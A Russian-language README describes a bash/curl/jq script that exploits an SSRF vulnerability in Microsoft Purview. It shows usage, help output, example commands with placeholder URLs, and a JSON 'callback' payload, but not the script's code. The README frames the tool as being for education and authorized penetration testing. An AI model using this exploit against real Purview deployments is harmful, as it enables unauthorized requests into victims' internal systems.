
Уязвимость SSRF в Microsoft Purview
Этот репозиторий содержит скрипт, предназначенный для выполнения эксплуатации SSRF (Server-Side Request Forgery) в целях тестирования и обучения. Используйте этот инструмент ответственно и только в средах, где у вас есть явное разрешение.
bash (командная оболочка Unix)jq (обработчик JSON)curl (инструмент командной строки для HTTP-запросов)./script.sh --exploit <target_url> <purview_url>
| Параметр | Описание |
|---|---|
-h, --help | Показать меню помощи. |
--exploit tu pu | Выполнить SSRF-эксплойт с целевым и purview URL. |
./script.sh -h
Вывод:
Usage:
./script.sh --exploit <target_url> <purview_url>
Options:
-h, --help - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
./script.sh --exploit http://example.com http://purview-url.com
Ожидаемый вывод:
SSRF exploit successful! Data retrieved:
<response data>
SSRF exploit failed! HTTP code: <code>
purview_url, пытаясь эксплуатировать уязвимость SSRF../script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
{
"callback": "http://callback-url.com"
}
Код HTTP-ответа и тело сохраняются, и на основе кода состояния определяется успех или неудача эксплойта.
Этот скрипт предназначен только для целей тестирования. Неправильное использование этого скрипта может привести к серьёзным юридическим последствиям. Обеспечьте соблюдение всех применимых законов и этических стандартов.
Не стесняйтесь вносить свой вклад, создавая pull request'ы или сообщая о проблемах.
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Автор не несёт ответственности за любое неправильное использование или ущерб, причинённый этим инструментом.